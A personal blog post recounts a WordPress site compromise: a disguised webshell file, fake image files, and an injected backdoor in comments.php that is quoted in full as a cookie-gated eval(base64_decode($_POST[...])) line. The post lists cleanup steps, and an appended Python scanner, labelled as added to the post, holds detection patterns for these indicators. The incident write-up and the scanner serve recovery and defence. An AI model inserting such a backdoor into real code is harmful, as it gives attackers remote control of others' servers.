Cureless

Cureless is the online journal (blog) of Yoru, a Filipina, programmer, ex-military, an anime otaku, a casual DoTA and MMORPG gamer and a self-proclaimed artist - in short, a geeky nerd and a fan.
Take a peek at her occasional ramblings about random passions and life experiences, browse her archives and works.

What compelled me to upgrade? (Part II)

(As if the hacking didn’t bring enough misery for me, my site’s page rank also dropped a week after I changed themes. Must there be something in that custom theme I made a year and a half ago?)

Anyway, getting back to the topic, imagine finding an almost familiar but strange file called functions_php.php among your top-level WordPress scripts. Your curiosity strikes, you decide to access the file from the web, and you get this:

[Screenshot: STNC Webshell - alien file]

Imagine the horror you feel when you learn that such an alien facility virtually enables almost anyone to access and modify your server files. Also imagine how long that strange file has been residing on your server, perfectly disguised among your CMS scripts.

Having been a web hosting consumer for the past 5 years, I know how it feels when the security of my 5-year-old files is breached. I almost panicked, and that spoiled my weekend promise to F.

I looked further for irregularities within my server files. The recurring error that knocked my server’s load was something from within the PHP scripts and not specifically that alien facility I mentioned earlier.

Furthermore, I also sought Google’s help for instances of similar incidents in other websites. I found this one. My initial hypothesis was right. It’s some hacker(s)’ doing. Immediately, I informed my host through SMS, and I was told to secure my passwords, etc.

When I looked for more search results, relating “WordPress” to “hacking”, I found this WordPress Philippines article. Exactly the one I was looking for. Digging beyond the article’s links I also found two more articles that somehow relieved me of the anxiety, knowing mine’s not an isolated case.

{from bloggerguide.net}
{from ocaoimh.ie}

Indeed, as detailed in the links mentioned above, I found even stranger files in my account: files with .pngg, .giff, and .jpegg extensions. I thought eliminating these would relieve my site of the hacker’s doings. I was wrong; even some of my .php files (comments.php) had been injected with some bastard code:

<?php if(md5($_COOKIE['_wp_debugger'])=="4afbe89ffaab79a9d54c4048322899b9"){ eval(base64_decode($_POST['file'])); exit; } ?>

What do I do with the tens and even hundreds of possibly infected files? (I just realized now that I’ve been in a similar predicament 6 years ago or so when my HTML files were infected by the Mythical HTML Redlof.A virus™. ;^^)

Thoughts of purging my server crossed my mind as a last resort. If I can’t clean them up, it’s easier to just delete all of them and then restore a clean backup later on. But the problem is… I don’t keep backups of my server files! Or if I did, they’re hidden within my archaic CD archives. :( (Edit: I found my June January 2008 backup! And already restored some sub-domains.)

Some lesson I had to learn.

When I finally gathered my wits, I had no choice but to perform the following steps:

  1. Downloaded a current backup of my server files (in its “infected” state)
  2. Read the articles related to the incident and took their tips, suggestions, etc.
  3. Disabled all WP plugins
  4. Upgraded my WP2.2 to WP2.5.1
  5. Following the helpful articles’ suggestions, I hunted for the possible infected files from the backup (in my computer)
  6. After finding the files (mostly plugin/theme/image files) from the downloaded backup in my computer, I deleted them one-by-one from the remote server
  7. Inspected my database and removed all traces of the hacking incident (as suggested by the articles)
  8. Changed all of my passwords (domain, DB, WordPress, etc.) - At this point, I was somehow confident I’d cleaned up all of my server files.

(If you’re experiencing a similar incident as mine, I suggest that you go directly to the links I stated.)

To date, I’m still monitoring my files and I suspect that they’re still not free of hacking traces. There could still be some files I haven’t cleaned up. But at least the host’s CPU is no longer complaining (for now, at least).
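Steps 5 and 6 above (hunting through the downloaded backup for injected files) can be automated against the two indicators this post describes: the doubled image extensions (.pngg, .giff, .jpegg) and the cookie-gated eval(base64_decode($_POST[...])) backdoor. The scanner below is an added example, not code from this blog or from WordPress; the directory layout and file contents in demo() are constructed for illustration, and the cookie hash constant is a placeholder rather than the one quoted above.

```python
import os
import re
import tempfile
from pathlib import Path

# Indicators taken from the incident described in the post: a PHP file that
# compares md5() of a cookie to a constant and then eval()s a base64 POST body,
# and image-like files whose extension has an extra letter.
SUSPICIOUS_PATTERNS = [
    re.compile(r"eval\s*\(\s*base64_decode\s*\(", re.I),
    re.compile(r"md5\s*\(\s*\$_COOKIE\[", re.I),
]
SUSPICIOUS_SUFFIXES = {".pngg", ".giff", ".jpegg"}

def scan_file(path: Path) -> list[str]:
    """Return the reasons a file looks injected; an empty list means no hit."""
    reasons = []
    if path.suffix.lower() in SUSPICIOUS_SUFFIXES:
        reasons.append(f"doubled image extension {path.suffix}")
    if path.suffix.lower() == ".php":
        try:
            text = path.read_text(errors="replace")
        except OSError:
            return reasons
        for pat in SUSPICIOUS_PATTERNS:
            if pat.search(text):
                reasons.append(f"matches {pat.pattern}")
    return reasons

def scan_tree(root: Path) -> dict[str, list[str]]:
    """Walk a downloaded backup; map each flagged relative path to its reasons."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            p = Path(dirpath) / name
            reasons = scan_file(p)
            if reasons:
                hits[p.relative_to(root).as_posix()] = reasons
    return hits

def demo() -> dict[str, list[str]]:
    """Build a constructed mini backup in a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        theme = root / "wp-content" / "themes" / "mine"
        uploads = root / "wp-content" / "uploads"
        theme.mkdir(parents=True)
        uploads.mkdir(parents=True)
        # constructed: comments.php carrying the same shape of backdoor as the post
        (theme / "comments.php").write_text(
            '<?php if(md5($_COOKIE["_wp_debugger"])=="PLACEHOLDER"){ eval(base64_decode($_POST["file"])); exit; } ?>')
        (theme / "index.php").write_text("<?php get_header(); ?>")  # clean
        (uploads / "logo.pngg").write_bytes(b"\x89PNG")  # doubled extension
        (uploads / "logo.png").write_bytes(b"\x89PNG")   # legitimate image
        return scan_tree(root)
```

Run scan_tree() against the backup directory you downloaded in step 1 and delete or inspect each flagged path on the remote server, as in step 6.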
